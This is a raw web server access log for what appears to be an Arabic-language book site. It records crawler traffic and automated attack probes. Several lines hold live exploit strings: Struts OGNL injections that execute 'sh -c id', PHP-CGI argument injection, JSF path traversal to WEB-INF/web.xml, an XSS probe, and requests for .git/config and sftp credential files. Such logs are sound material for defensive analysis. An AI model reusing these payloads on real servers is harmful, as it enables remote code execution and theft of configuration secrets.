45.192.99.121 - - [14/Jun/2025:13:44:46 +0200] "POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
66.249.75.225 - - [14/Jun/2025:14:17:47 +0200] "GET /authors/148 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.161 - - [14/Jun/2025:15:32:02 +0200] "GET /products/%D8%A7%D9%84%D8%AB%D9%82%D8%A7%D9%81%D8%A9-%D8%A7%D9%84%D8%AF%D9%88%D8%A7%D8%A6%D9%8A%D8%A9/122 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.192.99.121 - - [14/Jun/2025:15:45:32 +0200] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0"
4.227.36.114 - - [14/Jun/2025:16:31:29 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.75 - - [14/Jun/2025:16:31:30 +0200] "GET /?rhlt-astratyjyt-fy-kazynw-shbr-alkhymt-mghamrt-alfwz-alkbyr HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.132.133.195 - - [14/Jun/2025:17:09:39 +0200] "GET /?slot HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
52.167.144.188 - - [14/Jun/2025:17:18:27 +0200] "GET /public/authors?page=1 HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
185.132.133.184 - - [14/Jun/2025:17:53:06 +0200] "GET /products/%D9%85%D9%86-%D9%87%D9%86%D8%A7-%D8%A5%D9%84%D9%89-%D8%A7%D9%84%D9%82%D9%84%D8%A8/176?slot HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
185.132.133.198 - - [14/Jun/2025:17:53:07 +0200] "GET /?slot HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
40.77.167.27 - - [14/Jun/2025:18:11:26 +0200] "GET /sitemap_index.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
20.171.207.75 - - [14/Jun/2025:18:20:26 +0200] "GET /?afdl-tqnyat-allb-fy-albwkr-almsry-dlyl-shaml-lfn-alfwz HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.213.105.61 - - [14/Jun/2025:18:23:05 +0200] "GET /.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.71"
66.249.76.163 - - [14/Jun/2025:19:00:59 +0200] "GET /products/%D9%85%D8%A7%D9%84%D8%A7%D8%AF%D9%8A%D8%A7/157 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.239.54.57 - - [14/Jun/2025:19:07:17 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36"
85.239.54.57 - - [14/Jun/2025:19:07:17 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36"
85.239.54.57 - - [14/Jun/2025:19:07:17 +0200] "GET //contact HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36"
40.77.167.241 - - [14/Jun/2025:19:09:34 +0200] "GET /sitemap_index.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
45.192.99.121 - - [14/Jun/2025:20:46:19 +0200] "POST /user.action HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
20.171.207.75 - - [14/Jun/2025:21:57:11 +0200] "GET /?rhlt-astratyjyt-fy-kazynw-shbr-alkhymt-mghamrt-alfwz-alkbyr HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.76.162 - - [14/Jun/2025:23:27:45 +0200] "GET /authors/132 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
4.227.36.114 - - [14/Jun/2025:23:38:10 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.75 - - [14/Jun/2025:23:38:11 +0200] "GET /?altjarb-alalktrwnyt-alastthnayyt-fy-kazynw-alswys HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.16.212.158 - - [14/Jun/2025:23:59:49 +0200] "GET /.git/config HTTP/1.1" 403 169 "-" "-"
23.178.112.212 - - [15/Jun/2025:00:12:31 +0200] "GET /.well-known/acme-challenge/f9HN1-MndUn7LJ8jBEXMwfwIv_c0rEMfFhUhI4seApk HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
45.192.99.121 - - [15/Jun/2025:00:38:20 +0200] "GET /reports/rwservlet/showenv HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0"
45.192.99.121 - - [15/Jun/2025:00:38:21 +0200] "POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1" 500 542 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0"
45.192.99.121 - - [15/Jun/2025:00:38:21 +0200] "GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1" 500 542 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
23.178.112.210 - - [15/Jun/2025:00:56:41 +0200] "GET /.well-known/acme-challenge/Xos8ZpbSZ7roQAxiHAa9-xRLZreSoibmLkyrvmwRn9w HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.219 - - [15/Jun/2025:00:56:44 +0200] "GET /.well-known/acme-challenge/Hu3NbVGmT8j4GGTyHtp2Gsiot4I3Edn4sRrntn3GcH8 HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.212 - - [15/Jun/2025:00:56:48 +0200] "GET /.well-known/acme-challenge/FlhN-t-vh7hKU1-BL3gegtgXahkWEfOjX93wfDKuucQ HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.213 - - [15/Jun/2025:00:56:51 +0200] "GET /.well-known/acme-challenge/_fj5LEsosZBQKZH9Wxyy1bhvlQtx7dfucgBhKfZdCNE HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
66.249.76.161 - - [15/Jun/2025:01:58:57 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.236 - - [15/Jun/2025:01:58:57 +0200] "GET /?afdl-tqnyat-allb-fy-albwkr-almsry-dlyl-shaml-lfn-alfwz HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.237 - - [15/Jun/2025:01:59:38 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.75.236 - - [15/Jun/2025:02:11:53 +0200] "GET /authors/63 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.237 - - [15/Jun/2025:02:22:27 +0200] "GET /product/pages/171 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.75.225 - - [15/Jun/2025:02:30:07 +0200] "GET /?maximizing-casino-experiences-in-zanzibar-tips-and-tricks HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.64 - - [15/Jun/2025:03:12:29 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.64 - - [15/Jun/2025:03:12:29 +0200] "GET /sitemap.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
104.210.140.130 - - [15/Jun/2025:03:32:53 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
66.249.75.225 - - [15/Jun/2025:03:45:55 +0200] "GET /authors/118 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.210.140.132 - - [15/Jun/2025:04:10:04 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
216.73.216.64 - - [15/Jun/2025:04:26:28 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.64 - - [15/Jun/2025:04:26:29 +0200] "GET /sitemap.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 542 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 500 542 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 500 542 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.9 Safari/605.1.15"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/123.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:05:34:26 +0200] "GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 500 542 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
66.249.75.224 - - [15/Jun/2025:05:39:37 +0200] "GET /authors/40 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.236 - - [15/Jun/2025:06:43:24 +0200] "GET /products/%D8%A7%D9%84%D9%85%D8%B1%D9%8A%D8%A7%D8%B9-%D8%A7%D8%B1%D9%81%D8%B9-%D8%A7%D9%84%D8%B4%D8%A7%D8%B4%D8%A9/84 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.192.99.121 - - [15/Jun/2025:07:52:54 +0200] "POST /user.action HTTP/1.1" 403 199 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
66.249.75.236 - - [15/Jun/2025:08:16:02 +0200] "GET /authors/4 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.167.144.156 - - [15/Jun/2025:08:57:32 +0200] "GET /public/authors/75 HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:08:59:54 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
45.192.99.121 - - [15/Jun/2025:08:59:55 +0200] "GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
216.73.216.64 - - [15/Jun/2025:09:59:20 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.64 - - [15/Jun/2025:09:59:20 +0200] "GET /sitemap.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
4.227.36.114 - - [15/Jun/2025:10:09:33 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.75 - - [15/Jun/2025:10:09:34 +0200] "GET /?afdl-tqnyat-allb-fy-albwkr-almsry-dlyl-shaml-lfn-alfwz HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
45.192.99.121 - - [15/Jun/2025:10:21:12 +0200] "GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
66.249.75.236 - - [15/Jun/2025:11:24:13 +0200] "GET /last-products?page=5 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.63 - - [15/Jun/2025:11:39:06 +0200] "GET /public/authors/26 HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.76.161 - - [15/Jun/2025:12:05:57 +0200] "GET /authors/86 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.161 - - [15/Jun/2025:12:28:37 +0200] "GET /category/%D8%B1%D9%88%D8%A7%D9%8A%D8%A9/119?page=7 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
13.39.16.88 - - [15/Jun/2025:12:43:12 +0200] "GET /sftp-config.json HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
13.39.16.88 - - [15/Jun/2025:12:43:15 +0200] "GET /.vscode/sftp.json HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
66.249.75.224 - - [15/Jun/2025:12:50:10 +0200] "GET /authors HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
